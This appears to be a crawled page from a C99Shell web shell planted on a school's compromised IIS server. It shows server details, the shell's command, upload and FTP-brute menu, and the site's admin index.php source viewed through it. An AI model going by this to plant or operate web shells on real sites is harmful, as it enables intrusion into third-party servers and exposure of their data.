!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

E:\thcsltv.edu.vn\httpdocs\admin\   drwxrwxrwx
Free 224.42 GB of 400 GB (56.11%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (1.44 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
  define
('_JEXEC'1);
  
define('DS'DIRECTORY_SEPARATOR); //\
  
if (file_exists(dirname(__FILE__) . '/defines.php'))  { include_once dirname(__FILE__) . '/defines.php'; }
  if (!
defined('_JDEFINES')) { define('JPATH_BASE'dirname(__FILE__)); require_once JPATH_BASE.'/includes/defines.php';}
  
$path PATH_ADMIN.'/includes/app.php';  if(file_exists($path)) { require $path;} else { echo 'File dose not exist!'; }
  
$obj = new app;  $obj->load();
  
$module $obj->get_input('module');  $task $obj->get_input('task');    $register $obj->get_input('register');   
  switch (
$module
    { case 
null:    $obj->task(PATH_LOGIN.'form.php');     break;  
      case 
'login'$obj->task(PATH_LOGIN.$module.'.php'); break;
      default:      
$obj->lib_menu(); include PATH_ADMIN.'/modules/home.php'
                    switch (
$task)
                    { case 
null:     $obj->task(PATH_DOCUMENT.$obj->root.'/admin/modules/mod_'.$module.'/'.$module.'.php'); break;   
                      case 
'delete'$obj->get_('data');   $db = new data
                                     
$db->delete_id($module,$_GET['id'],'index.php?module='.$module);     break;
                      default:  if (
$register == null
                                    { 
$obj->task(PATH_DOCUMENT.$obj->root.'/admin/modules/mod_'.$module.'/form_'.$task.'.php'); } 
                                     else  { 
$obj->task(PATH_DOCUMENT.$obj->root.'/admin/modules/mod_'.$module.'/'.$register.'.php'); }                    
                    }             
    }
 
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.6152 ]--